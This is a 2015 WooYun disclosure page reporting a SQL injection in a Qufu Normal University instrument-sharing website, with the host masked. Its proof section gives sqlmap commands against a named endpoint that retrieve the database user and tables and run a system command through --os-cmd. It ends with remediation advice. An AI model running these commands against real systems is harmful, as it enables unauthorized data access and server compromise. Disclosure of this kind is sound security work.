当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145149

漏洞标题:曲阜师范大学某网站SQL注入

相关厂商:曲阜师范大学

漏洞作者: 小花猪Python

提交时间:2015-10-08 14:36

修复时间:2015-10-13 14:38

公开时间:2015-10-13 14:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-08: 细节已通知厂商并且等待厂商处理中
2015-10-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

曲阜师范大学某网站SQL注入,可获取数据,可执行系统命令

详细说明:

存在SQL注入漏洞的网站是曲阜师范大学大型仪器共享服务平台,网址是

http://**.**.**.**/

存在SQL注入的链接是

http://**.**.**.**/model/TwoGradePage/NewsEquipment.aspx?id=11370&openid=172&tab=two

通过sqlmap发现注入漏洞

sqlmap.py -u "http://**.**.**.**/model/TwoGradePage/NewsEquipment.aspx?id=11370&openid=172&tab=two" --time-sec=10

发现漏洞.png

获取当前用户与数据库,发现为sa用户

sqlmap.py -u "http://**.**.**.**/model/TwoGradePage/NewsEquipment.aspx?id=11370&openid=172&tab=two" --time-sec=10 --current-user --current-db

当前数据库和用户.png

漏洞证明:

获取当前数据库upswxlab_qfu的表信息

sqlmap.py -u "http://**.**.**.**/model/TwoGradePage/NewsEquipment.aspx?id=11370&openid=172&tab=two" --time-sec=10 -D upswxlab_qfu --tables

表.png

执行系统命令whoami

sqlmap.py -u "http://**.**.**.**/model/TwoGradePage/NewsEquipment.aspx?id=11370&openid=172&tab=two" --time-sec=10 --os-cmd="whoami"

whoami.png

点到为止

修复方案:

1、完善代码,过滤用户输入
2、部署WAF

版权声明:转载请注明来源 小花猪Python@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-13 14:38

厂商回复:

最新状态:

暂无